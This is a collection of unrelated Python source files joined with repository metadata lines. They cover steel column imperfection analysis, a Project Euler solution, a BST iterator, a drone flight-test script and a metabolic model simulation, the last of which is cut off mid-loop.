specimen.centre_line_from_pickle('./' + path + 'centreline.pkl')
# Add all sides and edges.
# they consist of FlatFace and RoundedEdge instances.
specimen.add_all_sides(n_sides, path + 'side_', fit_planes=True, offset_to_midline=True)
# Check if the existing edges found in the directory correspond one by one to the sides. If so, then the
# intersection lines of adjacent sides are calculated and added to the edges as reference lines. Otherwise, the
# edges are imported from whatever files are found and no reference lines are calculated.
if side_filename_numbers == edge_filename_numbers:
intrsct_lines = True
else:
intrsct_lines = False
specimen.add_all_edges(n_edges, path + 'edge_', intrsct_lines=intrsct_lines)
# Find a series of points for each edge based on the scanned surface.
specimen.find_real_edges(offset_to_midline=True, ref_lines=True)
# Calculate the initial imperfection displacements based on the edge and facet reference line and plane
# accordingly.
specimen.find_edge_imperfection_displacements()
specimen.find_facet_imperfection_displacements()
# Assign the constructed specimen to the object
self.real_specimen = specimen
def add_experiment(self, fh):
"""Add and post-process data from a test"""
self.experiment_data = TestData.from_file(fh)
self.experiment_data.specimen_length = self.theoretical_specimen.geometry.length
self.experiment_data.cs_area = self.theoretical_specimen.cs_props.area
self.experiment_data.process_data()
def report_real_specimen(self):
"""Print a report for the processed scanned data of the real specimen."""
print('Report for {}'.format(self.name))
self.real_specimen.print_report()
class TheoreticalSpecimen(sd.Part):
"""
Properties and calculations of a theoretical (ideal geometry) polygonal column.
"""
def __init__(self,
geometry=None,
cs_props=None,
material=None,
struct_props=None,
bc_loads=None):
super().__init__(
geometry,
cs_props,
material,
struct_props,
bc_loads)
@classmethod
def from_geometry(
cls,
n_sides,
r_circle,
thickness,
length,
f_yield,
fab_class
):
"""
Create theoretical polygonal column object for given geometric data.
The constructor calculates properties of the polygonal column object (cross-section props,
resistance, geometric props etc). The calculated data is then used to construct an object.
Parameters
----------
n_sides : int
Number of sides of the polygon cross-section.
r_circle : float
Radius of the circle circumscribed to the polygon.
thickness : float
Thickness of the cross-section.
length : float
Length of the column.
f_yield : float
Yield stress of the material.
fab_class : {'fcA', 'fcB', 'fcC'}
Fabrication class, as described in EN 1996-1-6. It is used in the calculation of the buckling resistance of
the cylinder of equal thickness-perimeter.
"""
# Create material
material = sd.Material(210000, 0.3, f_yield)
epsilon = np.sqrt(235. / f_yield)
# Radius of the polygon's circumscribed circle
r_circum = (np.pi * r_circle) / (n_sides * np.sin(np.pi / n_sides))
# Diameter
diam_circum = 2 * r_circum
# Central angles
theta = 2 * np.pi / n_sides
# Width of each side
side_width = diam_circum * np.sin(np.pi / n_sides)
# Polar coordinate of the polygon vertices on the cross-section plane
phii = []
for i_index in range(n_sides):
phii.append(i_index * theta)
# Polygon corners coordinates.
x_corners = tuple(r_circum * np.cos(phii))
y_corners = tuple(r_circum * np.sin(phii))
# Cross-sectional properties
nodes = [x_corners, y_corners]
elem = [
list(range(0, len(x_corners))),
list(range(1, len(x_corners))) + [0],
len(x_corners) * [thickness]
]
cs_sketch = sd.CsSketch(nodes, elem)
geometry = sd.Geometry(cs_sketch, length, thickness)
cs_props = sd.CsProps.from_cs_sketch(cs_sketch)
cs_props.max_dist = r_circum
cs_props.min_dist = np.sqrt(r_circum ** 2 - (side_width / 2) ** 2)
lmbda_y = sd.lmbda_flex(
length,
cs_props.area,
cs_props.moi_1,
kapa_bc=1.,
e_modulus=material.e_modulus,
f_yield=material.f_yield
)
lmbda_z = sd.lmbda_flex(
length,
cs_props.area,
cs_props.moi_2,
kapa_bc=1.,
e_modulus=material.e_modulus,
f_yield=material.f_yield
)
# Axial compression resistance , Npl
n_pl_rd = n_sides * sd.n_pl_rd(thickness, side_width, f_yield)
# Compression resistance of equivalent cylindrical shell
n_b_rd_shell = 2 * np.pi * r_circle * thickness * sd.sigma_x_rd(
thickness,
r_circle,
length,
f_yield,
fab_quality=fab_class,
gamma_m1=1.
)
# Plate classification acc. to EC3-1-1
p_classification = side_width / (epsilon * thickness)
# Tube classification slenderness acc. to EC3-1-1
t_classification = 2 * r_circle / (epsilon ** 2 * thickness)
struct_props = sd.StructProps(
t_classification=t_classification,
p_classification=p_classification,
lmbda_y=lmbda_y,
lmbda_z=lmbda_z,
n_pl_rd=n_pl_rd,
n_b_rd_shell=n_b_rd_shell
)
geometry.r_circle = r_circle
return cls(geometry, cs_props, material, struct_props)
@classmethod
def from_slenderness_and_thickness(
cls,
n_sides,
p_classification,
thickness,
length,
f_yield,
fab_class
):
"""
Create theoretical polygonal column object for given number of sides and cross-section slenderness.
The constructor calculates properties of the polygonal column object (cross-section props,
resistance, geometric props etc) which are then used to construct an object.
Parameters
----------
n_sides : int
Number of sides of the polygon cross-section.
p_classification : float
Facet slenderness, c/(ε*t).
thickness : float
Thickness of the cross-section.
length : float
Length of the column.
f_yield : float
Yield stress of the material.
fab_class : {'fcA', 'fcB', 'fcC'}
Fabrication class, as described in EN 1996-1-6. It is used in the calculation of the buckling resistance of
the cylinder of equal thickness-perimeter.
"""
# Epsilon for the material
epsilon = np.sqrt(235. / f_yield)
# Radius of the equal perimeter cylinder
r_circle = n_sides * thickness * epsilon * p_classification / (2 * np.pi)
return cls.from_geometry(
n_sides,
r_circle,
thickness,
length,
f_yield,
fab_class
)
@classmethod
def from_slenderness_and_radius(
cls,
n_sides,
r_circle,
p_classification,
length,
f_yield,
fab_class
):
"""
Create theoretical polygonal column object for given geometric data.
The constructor calculates properties of the polygonal column object (cross-section props,
resistance, geometric props etc). The calculated data is then used to construct an object.
Parameters
----------
n_sides : int
Number of sides of the polygon cross-section.
r_circle : float
Radius of the circle circumscribed to the polygon.
p_classification : float
Facet slenderness, c/(ε*t).
length : float
Length of the column.
f_yield : float
Yield stress of the material.
fab_class : {'fcA', 'fcB', 'fcC'}
Fabrication class, as described in EN 1996-1-6. It is used in the calculation of the buckling resistance of
the cylinder of equal thickness-perimeter.
"""
# Epsilon for the material
epsilon = np.sqrt(235. / f_yield)
# Calculate the thickness
thickness = 2 * np.pi * r_circle / (n_sides * epsilon * p_classification)
return cls.from_geometry(
n_sides,
r_circle,
thickness,
length,
f_yield,
fab_class
)
class RealSpecimen:
"""
A column specimen of polygonal cross-section.
Used for the scanned polygonal specimens.
"""
def __init__(self, sides=None, edges=None, centre_line=None, thickness=None):
if sides is None:
sides = []
if edges is None:
edges = []
self.sides = sides
self.edges = edges
self.centre_line = centre_line
self.thickness = thickness
def centre_line_from_pickle(self, fh):
"""
Import a centre-line to the polygonal object from a pickle file.
The pickle file is expected to contain a list of 2 points from which the line is constructed. This method is
used in combination with the equivalent `export` method from blender.
Parameters
----------
fh : str
Path and filename of the pickle file.
"""
self.centre_line = ag.Line3D.from_pickle(fh)
def add_single_side_from_pickle(self, filename):
"""
Create a FlatFace instance as one side af the polygon column.
The FlatFace instance is created from a pickle file of scanned data points.
:param filename:
:return:
"""
self.sides.append(s3d.FlatFace.from_pickle(filename))
def add_all_sides(self, n_sides, prefix, fit_planes=False, offset_to_midline=False):
"""
Add multiple sides.
Multiple FlatFace instances are created as sides of the polygonal column. A series of files containing scanned
data points must be given. The files should be on the same path and have a filename structure as:
`path/basenameXX.pkl`, where XX is an id number in ascending order starting from 01.
Only the `path/basename` is given as input to this method.
Parameters
----------
n_sides : int
Number of sides of the polygonal cross-section to look for in the directory
prefix : str
Path and file name prefix for the pickle files containing the scanned data points.
fit_planes :
Perform least square fitting on the imported data to calculate the reference planes.
offset_to_midline :
Offset the data points and the fitted plane by half the thickness to be on the midline of the cross-section.
"""
self.sides = []
for x in range(1, n_sides + 1):
print('Adding scanned data, facet: {}'.format(x))
self.sides.append(s3d.FlatFace.from_pickle(prefix + '{:02d}.pkl'.format(x)))
if fit_planes:
for i, x in enumerate(self.sides):
print('Fitting a reference plane, facet: {}'.format(i + 1))
x.fit_plane()
if offset_to_midline:
offset = self.thickness / 2
for i, x in enumerate(self.sides):
print('Offsetting plane and points, facet: {}'.format(i + 1))
x.offset_face(offset, offset_points=True)
def add_single_edge_from_pickle(self, filename):
"""
Create a RoundEdge instance as one edges af the polygon column.
The RoundEdge instance is created from a pickle file of scanned data points.
:param filename:
:return:
"""
self.edges.append(s3d.RoundedEdge.from_pickle(filename))
def add_all_edges(self, n_sides, prefix, intrsct_lines=False):
"""
Add multiple edges.
Multiple RoundEdge instances are created as edges of the polygonal column. A series of files containing scanned
data points must be given. The files should be on the same path and have a filename structure as:
`path/basenameXX.pkl`, where XX is an id number in ascending order starting from 01.
Only the `path/filename` is given as input to this method.
After adding the sequential edges, if intrsct_lines=True, the reference lines are calculated as the
intersections of sequential sides.
Parameters
----------
n_sides : int
Number of edges to be added (number of cross-sections sides).
prefix : str
Path and prefix of naming (read description for the expected naming scheme)
intrsct_lines : bool
Assign intersection lines to the edges from the intersection of adjacent facets.
"""
self.edges = []
for x in range(1, n_sides + 1):
print('Adding scanned data, edge: {}'.format(x))
self.edges.append(s3d.RoundedEdge.from_pickle(prefix + '{:02d}.pkl'.format(x)))
if intrsct_lines:
for x in range(-len(self.sides), 0):
print('Adding theoretical edge, edge: {}'.format(x + n_sides + 1))
self.edges[x].theoretical_edge = (self.sides[x].ref_plane & self.sides[x + 1].ref_plane)
def find_real_edges(self, offset_to_midline=False, ref_lines=False):
"""
Find edge points on the scanned rounded edge.
A series of points is returned which represent the real edge of the polygonal column. Each point is calculated
as the intersection of a circle and a line at different heights of the column, where the circle is best fit to
the rounded edge scanned points and the line passing through the reference edge (see `add_all_edges`
documentation) and the polygon's centre line.
Parameters
----------
offset_to_midline : bool
Offset the calculated points to the midline of the section based on the thickness property of the object.
ref_lines : bool
Assign reference lines to the edges by best fitting on the real edge points.
"""
if offset_to_midline:
offset = -self.thickness / 2
else:
offset = 0
if isinstance(self.centre_line, ag.Line3D) and isinstance(self.edges, list):
for i, x in enumerate(self.edges):
print('Fitting circles and calculating edge points, edge: {}'.format(i + 1))
x.fit_circles(axis=2, offset=offset)
x.calc_edge_points(self.centre_line)
else:
print('Wrong type inputs. Check if the real_specimen object has a centre line assigned to it and if it has'
'a list of edge lines.')
return NotImplemented
if ref_lines:
for i, x in enumerate(self.edges):
print('Calculating reference line by fitting on the edge points, edge: {}'.format(i + 1))
x.calc_ref_line()
def find_edge_imperfection_displacements(self):
"""Calculate distances of edge points to each reference line."""
for i, x in enumerate(self.edges):
print('Calculating initial imperfection displacements, edge: {}.'.format(i + 1))
if x.ref_line:
if x.ref_line is NotImplemented:
print('The reference line is type `NotImplemented`, fitting possibly did not converge.')
x.edge2ref_dist = NotImplemented
else:
x.calc_edge2ref_dist()
else:
print('No reference line. Edge imperfection not calculated.')
x.edge2ref_dist = NotImplemented
def find_facet_imperfection_displacements(self):
"""Calculate distances of edge points to each reference line."""
for i, x in enumerate(self.sides):
print('Calculating initial imperfection displacements, facet: {}'.format(i + 1))
x.calc_face2ref_dist()
def plot_all(self):
"""
Plot all data.
:return:
"""
max_z = max([x.scanned_data[:, 2].max() for x in self.sides])
min_z = min([x.scanned_data[:, 2].min() for x in self.sides])
fig1 = plt.figure()
Axes3D(fig1)
for i in range(-len(self.sides), 0):
self.sides[i].plot_face(reduced=0.001, fig=fig1)
for i in range(-len(self.edges), 0):
self.edges[i].facet_intrsct_line.plot_line(fig=fig1, ends=[min_z, max_z])
def print_report(self):
"""
Print a report for the polygon column.
"""
for i, x in enumerate(self.sides):
if x.face2ref_dist is NotImplemented:
print('No initial displacement data, facet: {}'.format(i + 1))
else:
print('Max init displacement from ref plane, facet: {}'.format(i + 1), max(np.abs(x.face2ref_dist)))
for i, x in enumerate(self.edges):
if x.edge2ref_dist is NotImplemented:
print('No initial displacement data, edge: {}'.format(i + 1))
else:
print('Max init displacement from ref line, edge: {}'.format(i + 1),
max(np.abs(x.edge2ref_dist)))
# TODO: Fix the following code and add more to the report.
# max_z = max([x.scanned_data[:, 2].max() for x in self.sides])
# min_z = min([x.scanned_data[:, 2].min() for x in self.sides])
# for i in range(len(self.sides)):
# print('Side {} is : {}'.format(i + 1, self.sides[i].ref_plane.plane_coeff))
# print('')
# print('Edge {} (sides {}-{})\n Direction : {}\n Through points : \n{}\n{}'.format(
# i + 1,
# i + 1,
# i + 2,
# self.edges[i].facet_intrsct_line.parallel,
# self.edges[i].facet_intrsct_line.xy_for_z(min_z),
# self.edges[i].facet_intrsct_line.xy_for_z(max_z))
# )
# print('')
class TestData(lt.Experiment):
def __init__(self, header, channel_header, data, name, specimen_length=None, cs_area=None):
self.specimen_length = specimen_length
self.cs_area = cs_area
super().__init__(header, channel_header, data, name)
def process_data(self):
"""
:return:
"""
self.calc_avg_strain()
self.calc_disp_from_strain()
self.calc_avg_stress()
def add_eccentricity(self, axis, column, moi, min_dist, thickness, young):
"""
Calculate eccentricity.
Adds a column in the data dictionary for the eccentricity of the load application on a given axis based on
two opposite strain measurements.
"""
self.data['e_' + axis] = []
for load, strain1, strain2 in zip(self.data['Load'], self.data[column[0]], self.data[column[1]]):
self.data['e_' + axis].append(self.eccentricity_from_strain(
load * 1000,
[strain1 * 1e-6, strain2 * 1e-6],
moi,
min_dist + thickness / 2,
young)
)
def offset_stroke(self, offset=None):
"""
Offset stroke values.
Parameters
----------
offset : float, optional
Distance to offset. By default, the initial displacement (first value) is used, effectively displaceing
the values to start from 0.
"""
if offset is None:
offset = self.data['Stroke'][0]
self.data['Stroke'] = self.data['Stroke'] - offset
def calc_disp_from_strain(self):
"""Calculate the specimen clear axial deformation based on measured strains"""
self.add_new_channel_zeros('disp_clear')
self.data['disp_clear'] = self.data['avg_strain'] * self.specimen_length
def calc_avg_strain(self):
"""Calculate the average strain from all strain gauges."""
# Create new data channel.
self.add_new_channel_zeros('avg_strain')
i = 0
# Collect all strain gauge records.
for key in self.data.keys():
if len(key) > 2:
if key[:2].isdigit() and (key[2] is 'F') or (key[2] is 'C'):
self.data['avg_strain'] = self.data['avg_strain'] + self.data[key]
i += 1
self.data['avg_strain'] = self.data['avg_strain'] / (i * 1e6)
def calc_avg_stress(self):
"""Calculate the average stress based on the measured reaction force on the load cell and the
theoretical area."""
# Create new data channel.
self.add_new_channel_zeros('avg_stress')
self.data['avg_stress'] = self.data['Load'] * 1e3 / self.cs_area
def plot_stroke_load(self, ax=None):
"""Load vs stroke curve plotter"""
if ax is None:
fig = plt.figure()
plt.plot()
ax = fig.axes[0]
self.plot2d('Stroke', 'Load', ax=ax)
ax.invert_xaxis()
ax.invert_yaxis()
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles[::-1], labels[::-1])
ax.set_xlabel('Displacement, u [mm]')
ax.set_ylabel('Reaction, N [kN]')
ax.grid()
return ax
elif not isinstance(ax, type(plt.axes())):
print('Unexpected input type. Input argument `ax` must be of type `matplotlib.pyplot.axes()`')
return NotImplemented
else:
self.plot2d('Stroke', 'Load', ax=ax)
return ax
def plot_strain_stress(self, ax=None):
"""Plot average strain vs average stress."""
if ax is None:
fig = plt.figure()
plt.plot()
ax = fig.axes[0]
self.plot2d('avg_strain', 'avg_stress', ax=ax)
ax.invert_xaxis()
ax.invert_yaxis()
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels)
ax.set_xlabel('Strain, ε')
ax.set_ylabel('Stress, σ [Mpa]')
ax.grid()
return ax
elif not isinstance(ax, type(plt.axes())):
print('Unexpected input type. Input argument `ax` must be of type `matplotlib.pyplot.axes()`')
return NotImplemented
else:
self.plot2d('avg_strain', 'avg_stress', ax=ax)
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels)
return ax
def plot_disp_load(self, ax=None):
"""Plot load vs real displacement."""
if ax is None:
fig = plt.figure()
plt.plot()
ax = fig.axes[0]
self.plot2d('disp_clear', 'Load', ax=ax)
ax.invert_xaxis()
ax.invert_yaxis()
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles[::-1], labels[::-1])
ax.set_xlabel('Displacement, u [mm]')
ax.set_ylabel('Reaction, N [kN]')
ax.grid()
return ax
elif not isinstance(ax, type(plt.axes())):
print('Unexpected input type. Input argument `ax` must be of type `matplotlib.pyplot.axes()`')
return NotImplemented
else:
self.plot2d('disp_clear', 'Load', ax=ax)
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles[::-1], labels[::-1])
return ax
@staticmethod
def eccentricity_from_strain(load, strain, moi, dist, young=None):
"""
Load eccentricity based on strain pairs.
Calculate the eccentricity of an axial load to the neutral axis of a specimen for which pairs of strains are
monitored with strain gauges. The eccentricity is calculated on one axis and requires the moment of inertia
around it and a pair of strains on tow positions symmetric to the neutral axis. Elastic behaviour is assumed.
"""
# Default values.
if young is None:
young = 210000.
else:
young = float(young)
# Eccentricity.
ecc = (strain[0] - strain[1]) * young * moi / (2 * load * dist)
# Return
return ecc
def semi_closed_polygon(n_sides, radius, t, tg, rbend, nbend, l_lip):
"""
Polygon sector nodes.
Calculates the node coordinates for a cross-section of the shape of
a lipped polygon sector.
Parameters
----------
n_sides : int
Number of sides of original polygon.
radius : float
Radius of the original polygon.
t : float
Thickness of the profile
tg : float
Thickness of the profile
rbend : float
Radius of the bended corners' arc
nbend : int
Number of nodes along the corners' arcs
l_lip : int
Length of the lips
Returns
-------
list of lists
Returns points for the entire profile (1st and 2nd returned values), and points for a single sector (3rd and 4th
returned values).
"""
# Angle corresponding to one face of the polygon
theta = 2 * np.pi / n_sides
# Angles of radii (measured from x-axis)
phi = np.linspace(5 * np.pi / 6, np.pi / 6, int(n_sides / 3 + 1))
# xy coords of the polygon's corners
x = radius * np.cos(phi)
y = radius * np.sin(phi)
# Bends
# Distance between bending centre and corner
lc = rbend / np.cos(theta / 2)
# Centers of bending arcs
xc = x[1:-1] - lc * np.cos(phi[1:-1])
yc = y[1:-1] - lc * np.sin(phi[1:-1])
# Angles of the edges' midlines (measured from x-axis)
phi_mids = phi[0:-1] - theta / 2
# xy coords of the arc's points
xarc = [[0 for j in range(nbend + 1)] for i in range(int(n_sides / 3 - 1))]
yarc = [[0 for j in range(nbend + 1)] for i in range(int(n_sides / 3 - 1))]
for i in range(int(n_sides / 3 - 1)):
for j in range(nbend + 1):
xarc[i][j] = xc[i] + rbend * np.cos(phi_mids[i] - j * (theta / nbend))
yarc[i][j] = yc[i] + rbend * np.sin(phi_mids[i] - j * (theta / nbend))
# Start-end extensions
# Bending radius
rs = rbend / 2
xcs = [0, 0]
ycs = [0, 0]
# First bend
v1 = phi_mids[0] - np.pi / 2
v2 = (phi[0] + phi_mids[0] - np.pi / 2) / 2
l1 = (t + tg) / (2 * np.cos(phi[0] - phi_mids[0]))
l2 = rs / np.sin(v2 - phi_mids[0] + np.pi / 2)
x1 = x[0] + l1 * np.cos(v1)
y1 = y[0] + l1 * np.sin(v1)
# First bend centre coords
xcs[0] = x1 + l2 * np.cos(v2)
ycs[0] = y1 + l2 * np.sin(v2)
# Last bend
v1 = phi_mids[-1] + np.pi / 2
v2 = (v1 + phi[-1]) / 2
l1 = (t + tg) / (2 * np.cos(v1 - phi[-1] - np.pi / 2))
l2 = rs / np.sin(v2 - phi[-1])
x1 = x[-1] + l1 * np.cos(v1)
y1 = y[-1] + l1 * np.sin(v1)
# Last bend centre coords
xcs[1] = x1 + l2 * np.cos(v2)
ycs[1] = y1 + l2 * np.sin(v2)
# First and last bend arc points coords
xsarc = [[0 for j in range(nbend + 1)] for j in [0, 1]]
ysarc = [[0 for j in range(nbend + 1)] for j in [0, 1]]
for j in range(nbend + 1):
xsarc[0][j] = xcs[0] + rs * np.cos(4 * np.pi / 3 + j * ((phi_mids[0] - np.pi / 3) / nbend))
ysarc[0][j] = ycs[0] + rs * np.sin(4 * np.pi / 3 + j * ((phi_mids[0] - np.pi / 3) / nbend))
xsarc[1][j] = xcs[1] + rs * np.cos(
phi_mids[-1] + np.pi + j * ((phi[-1] + np.pi / 2 - phi_mids[-1]) / nbend))
ysarc[1][j] = ycs[1] + rs * np.sin(
phi_mids[-1] + np.pi + j * ((phi[-1] + np.pi / 2 - phi_mids[-1]) / nbend))
# Points of the lips
# Lip length according to bolt washer diameter
# First lip
xstart = [xsarc[0][0] + l_lip * np.cos(phi[0]), xsarc[0][0] + l_lip * np.cos(phi[0]) / 2]
ystart = [ysarc[0][0] + l_lip * np.sin(phi[0]), ysarc[0][0] + l_lip * np.sin(phi[0]) / 2]
# Last point
xend = [xsarc[1][-1] + l_lip * np.cos(phi[-1]) / 2, xsarc[1][-1] + l_lip * np.cos(phi[-1])]
yend = [ysarc[1][-1] + l_lip * np.sin(phi[-1]) / 2, ysarc[1][-1] + l_lip * np.sin(phi[-1])]
# Collect the x, y values in a sorted 2xn array
xarcs, yarcs = [], []
for i in range(len(phi) - 2):
xarcs = xarcs + xarc[i][:]
yarcs = yarcs + yarc[i][:]
x_sector = xstart + xsarc[0][:] + xarcs[:] + xsarc[1][:] + xend
y_sector = ystart + ysarc[0][:] + yarcs[:] + ysarc[1][:] + yend
# Copy-rotate the points of the first sector to create the entire CS
# Rotation matrix
rot_matrix = np.array([[np.cos(-2 * np.pi / 3), -np.sin(-2 * np.pi / 3)],
[np.sin(-2 * np.pi / 3), np.cos(-2 * np.pi / 3)]])
# Dot multiply matrices
coord1 = np.array([x_sector, y_sector])
coord2 = rot_matrix.dot(coord1)
coord3 = rot_matrix.dot(coord2)
# Concatenate into a single xy array
x_cs = np.concatenate([coord1[0], coord2[0], coord3[0]])
y_cs = np.concatenate([coord1[1], coord2[1], coord3[1]])
# Return matrices
return [x_cs, y_cs, x_sector, y_sector]
def main(
add_real_specimens=True,
add_experimental_data=True,
make_plots=True,
export=False,
print_reports=True
):
if export is True:
export='./data/polygonal.pkl'
# Create a polygonal column object.
length = 700.
f_yield = 700.
fab_class = 'fcA'
print('Creating the polygonal column objects.')
cases = [PolygonalColumn(name='specimen{}'.format(i + 1)) for i in range(9)]
print('Adding theoretical specimens with calculations to the polygonal columns')
cases[0].add_theoretical_specimen(16, length, f_yield, fab_class, thickness=3., p_class=30.)
cases[1].add_theoretical_specimen(16, length, f_yield, fab_class, thickness=3., p_class=40.)
cases[2].add_theoretical_specimen(16, length, f_yield, fab_class, thickness=3., p_class=50.)
cases[3].add_theoretical_specimen(20, length, f_yield, fab_class, thickness=3., p_class=30.)
cases[4].add_theoretical_specimen(20, length, f_yield, fab_class, thickness=3., p_class=40.)
cases[5].add_theoretical_specimen(20, length, f_yield, fab_class, thickness=2., p_class=50.)
cases[6].add_theoretical_specimen(24, length, f_yield, fab_class, thickness=3., p_class=30.)
cases[7].add_theoretical_specimen(24, length, f_yield, fab_class, thickness=2., p_class=40.)
cases[8].add_theoretical_specimen(24, length, f_yield, fab_class, thickness=2., p_class=50.)
print('Adding real specimens with the 3d scanned data to the polygonal columns.')
if add_real_specimens:
for i in range(9):
print('Adding real scanned shape to specimen number {}'.format(i + 1))
cases[i].add_real_specimen('data/sp{}/'.format(i + 1))
print('Adding experimental data from the compression tests.')
if add_experimental_data:
for i in range(9):
print('Adding experimental data to specimen number {}'.format(i + 1))
cases[i].add_experiment('data/sp{}/experiment/sp{}.asc'.format(i + 1, i + 1))
# Correction of stroke tare value on some measurements.
cases[1].experiment_data.offset_stroke()
cases[3].experiment_data.offset_stroke()
cases[4].experiment_data.offset_stroke()
if make_plots:
print('Producing plots.')
# Strain-stress curves
ax = cases[0].experiment_data.plot_strain_stress()
cases[1].experiment_data.plot_strain_stress(ax=ax)
cases[2].experiment_data.plot_strain_stress(ax=ax)
ax = cases[3].experiment_data.plot_strain_stress()
cases[4].experiment_data.plot_strain_stress(ax=ax)
cases[5].experiment_data.plot_strain_stress(ax=ax)
ax = cases[6].experiment_data.plot_strain_stress()
cases[7].experiment_data.plot_strain_stress(ax=ax)
cases[8].experiment_data.plot_strain_stress(ax=ax)
# Displacement-load
if print_reports:
for i in cases:
print('')
i.report_real_specimen()
if export:
print('Exporting the generated object with all the processed specimens to pickle.')
with open(export, 'wb') as fh:
pickle.dump(cases, fh)
return cases
| 2.625 | 3 |
problems/21.py | christofferaakre/project-euler | 0 | 12772892 | <gh_stars>0
#!/usr/bin/env python3
from main import Solver, list_divisors
solver = Solver()
def are_amicable(x: int, y: int) -> bool:
sum_x = sum(list_divisors(x, proper=True))
sum_y = sum(list_divisors(y, proper=True))
if x != y and sum_x == y and sum_y == x:
return True
else:
return False
S = 0
for x in range(1, 10000):
for y in range(1, x):
if are_amicable(x, y):
S += (x + y)
solver.solve(21, S)
| 3.34375 | 3 |
data_structure/binary_search_tree/173. Binary Search Tree Iterator_medium.py | JunzhongLin/leetcode_practice | 0 | 12772893 | '''
Implement the BSTIterator class that represents an iterator over the in-order traversal of a binary search tree (BST):
BSTIterator(TreeNode root) Initializes an object of the BSTIterator class. The root of the BST is given as part of the constructor. The pointer should be initialized to a non-existent number smaller than any element in the BST.
boolean hasNext() Returns true if there exists a number in the traversal to the right of the pointer, otherwise returns false.
int next() Moves the pointer to the right, then returns the number at the pointer.
Notice that by initializing the pointer to a non-existent smallest number, the first call to next() will return the smallest element in the BST.
You may assume that next() calls will always be valid. That is, there will be at least a next number in the in-order traversal when next() is called.
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class BSTIterator(object):
def __init__(self, root):
"""
:type root: TreeNode
"""
self.stack = [root]
self.size = 1
def next(self):
"""
:rtype: int
"""
while self.stack:
node = self.stack.pop()
if not node:
node = self.stack.pop()
self.size = len(self.stack)
return node.val
if node.right:
self.stack.append(node.right)
self.stack.append(node)
self.stack.append(None)
if node.left:
self.stack.append(node.left)
return None
def hasNext(self):
"""
:rtype: bool
"""
return self.size > 0
# Your BSTIterator object will be instantiated and called as such:
# obj = BSTIterator(root)
# param_1 = obj.next()
# param_2 = obj.hasNext() | 4.15625 | 4 |
2457.py | heltonricardo/URI | 6 | 12772894 | c = input().strip()
fr = input().split()
n = 0
for i in fr:
if c in i: n += 1
print('{:.1f}'.format(n*100/len(fr)))
| 3.15625 | 3 |
setup.py | atkirtland/pyffe | 8 | 12772895 | from setuptools import setup
setup(name='pyffe',
version='0.1',
description='Tools and utils for PyCaffe',
# url='http://github.com/fabiocarrara/pyffe',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
packages=['pyffe', 'pyffe.models'],
zip_safe=False,
requires=['functools32', 'tqdm', 'pandas', 'lmdb', 'caffe']
)
| 1.0625 | 1 |
dronecode/pruebas_vuelo.py | tomasjm/dronekit-ufro | 3 | 12772896 | """
dronekit-sitl copter --home=-38.7460967,-72.6154299,0,180
mavproxy.py --master tcp:127.0.0.1:5760 --out udp:127.0.0.1:14550 --out udp:127.0.0.1:14551
mission planner en puerto udp:14550
dronekit en puerto udp:14551
https://github.com/ArduPilot/MAVProxy/issues/543
"""
# from pymavlink import mavutil
"""
------------------------------
IMPORTS E INICIALIZACION
------------------------------
"""
from dronekit import connect, VehicleMode
from time import sleep
from vuelo import despegarVehiculo, moverAlPunto, aterrizarVehiculo, goto
from utils import agregarDistanciaMetros
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--connect', default='udp:192.168.8.120:14551')
args = parser.parse_args()
print('Conectando al vehiculo en: %s' % args.connect)
vehicle = connect(args.connect, baud=57600, wait_ready=True)
"""
------------------------------
CODIGO PRINCIPAL
------------------------------
"""
def prueba_default():
print("------COMENZANDO LA PRIMERA PRUEBA ------")
despegarVehiculo(vehicle, 3)
sleep(8)
aterrizarVehiculo(vehicle)
sleep(1)
vehicle.close()
def prueba_movimiento():
print("------COMENZANDO LA SEGUNDA PRUEBA ------")
despegarVehiculo(vehicle, 5)
goto(vehicle, 2.5, 2.5)
sleep(3)
goto(vehicle, 2.5, 2.5)
sleep(3)
aterrizarVehiculo(vehicle)
sleep(1)
vehicle.close()
def prueba_final():
print("------COMENZANDO LA TERCERA PRUEBA ------")
despegarVehiculo(vehicle, 30)
goto(vehicle, 5, 0)
sleep(1)
goto(vehicle, -1.5, 3.5)
sleep(1)
goto(vehicle, -3.5, 1.5)
sleep(1)
goto(vehicle, -3.5, -1.5)
sleep(1)
goto(vehicle, -1.5, -3.5)
sleep(1)
goto(vehicle, 1.5, -3.5)
sleep(1)
goto(vehicle, 3.5, -1.5)
sleep(1)
goto(vehicle, 3.5, 1.5)
sleep(1)
goto(vehicle, 1.5, 3.5)
sleep(1)
goto(vehicle, -5, 0)
sleep(1)
aterrizarVehiculo(vehicle)
vehicle.close()
prueba_movimiento()
| 2.578125 | 3 |
ComplementaryScripts/Step_03_Compare_Refine/Step_simulate_case02.py | HaoLuoChalmers/Lactobacillus_reuteri_MM41A_GEM | 0 | 12772897 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by <NAME> at 2019-09-02
"""Step_simulate.py
:description : script
:param :
:returns:
:rtype:
"""
import os
import cobra
import matplotlib.pyplot as plt
import numpy as np
os.chdir('../../ComplementaryData/Step_03_Compare_Refine/')
print('----- loading model -----')
iHL622 = cobra.io.load_json_model('../../ModelFiles/iHL622.json')
# %% <biomass vs od >
print('----- change medium -----')
iHL622.objective = "BIOMASS"
experiment_group = ['A', 'B', 'C', 'D', 'E']
experiment_result = [1.38, 1.88, 1.92, 1.92, 1.90]
experiment_result_err = [0.66, 0.35, 0.69, 0.37, 0.47]
experiment_medium = {
'EX_glc__D_e': [-20, -20, -20, -20, -20, ],
'EX_glyc_e': [0.00, -5.00, -5.00, -10.00, -10.],
'EX_fru_e': [0.00, -1.00, -5.00, -1.00, -5.],
'EX_lac__L_e': [18.215, 21.334, 20.882, 17.881, 16.577],
'EX_ac_e': [17.058, 18.301, 18.285, 19.703, 19.643],
'EX_etoh_e': [5.135, 4.623, 4.312, 2.558, 2.230],
}
# for k in experiment_medium.keys(): # g/L --> mM
# temp = np.array(experiment_medium[k])*1000/iHL622.metabolites.get_by_id(k.replace('EX_','')).formula_weight
# experiment_medium[k] = temp
predict_result = []
for i in range(0, len(experiment_result)):
model = iHL622.copy()
for rea in experiment_medium.keys():
